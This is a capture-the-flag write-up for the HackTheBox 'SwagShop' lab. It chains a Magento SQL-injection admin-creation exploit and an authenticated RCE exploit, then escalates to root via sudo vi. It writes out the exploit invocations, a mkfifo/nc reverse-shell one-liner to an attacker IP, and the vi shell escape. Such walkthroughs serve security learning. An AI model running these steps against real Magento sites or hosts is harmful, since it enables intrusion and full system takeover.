SwagShop
An easy Linux box from HackTheBox, use a chain of two CVEs on Magento to get initial access, then abuse sudo privileges on vi to get root.
Recon
Running the usual nmap
georgy@pop-os:~/Documents/htb/swagshop$ sudo nmap -sC -sV -Pn -oA nmap/init 10.10.10.140
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b6552bd24e8fa3817261379a12f624ec (RSA)
| 256 2e30007a92f0893059c17756ad51c0ba (ECDSA)
|_ 256 4c50d5f270c5fdc4b2f0bc4220326434 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Home page
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Not much to see at all, start a nmap on all ports in the background while we look at the webapp
georgy@pop-os:~/Documents/htb/swagshop$ sudo nmap -T4 -p- -o nmap/allports 10.10.10.140
Dont get any response from the webapp, besides the URL being changed to “swagshop.htb”, so add that to /etc/hosts and navigate to http://swagshop.htb
And see a Magento store, the version seemingly from 2014 by the footer
Google around for a Magento scanner, and come up on this one
Git clone it, and download the .phar file
georgy@pop-os:~/Documents/htb/swagshop$ php magescan.phar scan:all swagshop.htb
+-----------+------------------+
| Parameter | Value |
+-----------+------------------+
| Edition | Community |
| Version | 1.9.0.0, 1.9.0.1 |
+-----------+------------------+
Don’t get much useful info besides the version, so google around for 1.9.0.0 and 1.9.0.1 Magento exploits
Come across this exploit and git clone it into the working directory
Exploitation
Inside the exploit have to modify it a little bit to get it to work
The exploit works as a SQL injection on the admin login form, to create a new admin user
Naturally, this means that the URL must be that of the admin page, so change
target_url = target + "/index.php/admin/Cms_Wysiwyg/directive/index/"
To
target_url = target + "/index.php/admin/"
And run it with
georgy@pop-os:~/Documents/htb/swagshop/Magento-Shoplift-SQLI$ python2.7 poc.py swagshop.htb
WORKED
Check http://swagshop.htb/admin with creds ypwq:123
So then we get an admin login to Magento, but this alone doesn’t get us code exec on the box
Running a quick searchsploit on Magento to see if I missed a true RCE
georgy@pop-os:~/Documents/htb/swagshop$ searchsploit magento
...
Magento CE < 1.9.0.1 - (Authenticated) Remote Code Execution | php/webapps/37811.py
....
Now that we have admin creds, maybe we can chain it with this exploit?
Looking at it, will have to change a few things, notably changing the values of the commented “Config” section of the exploit
This exploit also utilises the admin login, so will have to use the URL with the admin login when running it
# Config.
username = 'ypwq'
password = '123'
php_function = 'system' # Note: we can only pass 1 argument to the function
install_date = 'Wed, 08 May 2019 07:23:09 +0000' # This needs to be the exact date from /app/etc/local.xml
Change the username and password to the output of the first exploit, but for the install date will need to use the date inside /app/etc/local.xml
Can use curl for this
curl -s http://swagshop.htb/app/etc/local.xml | grep date
<date><![CDATA[Wed, 08 May 2019 07:23:09 +0000]]></date>
And paste the date in like above
Now run the exploit with
georgy@pop-os:~/Documents/htb/swagshop$ python2.7 37811.py "http://swagshop.htb/index.php/admin" "whoami"
www-data
And have code exec! Now to upgrade to a reverse shell can use a bash reverse shell, and start a listener on 8888
georgy@pop-os:~/Documents/htb/swagshop$ python2.7 37811.py "http://swagshop.htb/index.php/admin" "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.8 8888 >/tmp/f"
And catch the shell
Connection received on 10.10.10.140 43202
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
And upgrade the terminal with the usual python3 pty
$ python3 -c "import pty;pty.spawn('/bin/bash');"
www-data@swagshop:/var/www/html$ export TERM=xterm
CTRL+Z
georgy@pop-os:~/Documents/htb/swagshop$ stty raw -echo;fg
Doing basic enumeration, see that www-data can run vi with sudo as root
www-data@swagshop:/var/www/html$ sudo -l
Matching Defaults entries for www-data on swagshop:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on swagshop:
(root) NOPASSWD: /usr/bin/vi /var/www/html/*
So lets do just that
www-data@swagshop:/var/www/html$ sudo -u root /usr/bin/vi /var/www/html/root
Then inside of vi, can start a shell by using “:!/bin/sh”
And get a shell as root!
# whoami
root
#